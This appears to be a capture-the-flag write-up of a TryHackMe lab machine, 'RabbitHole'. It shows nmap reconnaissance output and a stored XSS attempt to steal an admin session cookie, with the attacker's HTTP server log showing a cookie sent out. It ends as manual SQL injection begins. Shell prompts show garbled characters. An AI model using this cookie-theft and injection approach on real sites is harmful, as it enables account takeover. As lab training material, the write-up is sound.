The following post by anthonyjsaab is licensed under
0 - Introduction
Link to room:
Machine version: RabbitHole v1.3
This writeup walks you through a room on TryHackMe created by
1 - Port Scan
1a - Discovery
โโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -T4 -p- rabbit.thm
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-25 21:53 EEST
Nmap scan report for rabbit.thm (10.10.45.20)
Host is up (0.096s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 723.03 seconds
1b - Versioning and OS fingerprinting
โโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -sC -sV -O -p22,80 rabbit.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-26 08:25 EEST
Nmap scan report for rabbit.thm (10.10.187.189)
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.59 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Your page title here :)
|_http-server-header: Apache/2.4.59 (Debian)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds
Note that dirbusting does not uncover any hidden pages.
2b - Normal user interaction
2c - Attempting XSS
When we logged in, the username of the admin was echoed on our webpage. Additionally, the admin appears to login every minute. If their landing page is the same as ours, and they are listed all the users and their last logins, an XSS attempt could let us steal their cookie.
After spinning up an HTTP server on our Kali machine, we will try to register using the following payload as a username:
โโโ(kaliใฟkali)-[~]
โโ$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.11.85.12 - - [26/Oct/2024 09:13:19] code 404, message File not found
10.11.85.12 - - [26/Oct/2024 09:13:19] "GET /cookie.php?cookie=PHPSESSID=17ac77983f5af39a34b0a8bfda8a09a1 HTTP/1.1" 404 -
This means that our payload was stored correctly and is correctly rendering on a browser.
We wait a bit for the admin to login again and trigger the payload on their browser. Unfortunately, after multiple minutes, no request was received on our HTTP server. We can confirm that the admin was logging in during our waiting by refreshing and seeing their attempts:
2d - SQLi
In the above image, we can see that our payload triggered an SQL error message to be displayed. This is a clear indication that the target is vulnerable to SQLi.
However, since "anti-bruteforce" measures are in place, we will avoid using sqlmap and will instead be doing everything manually.
2di - Enumerating how many columns needed for successful UNION with previous SQL statement
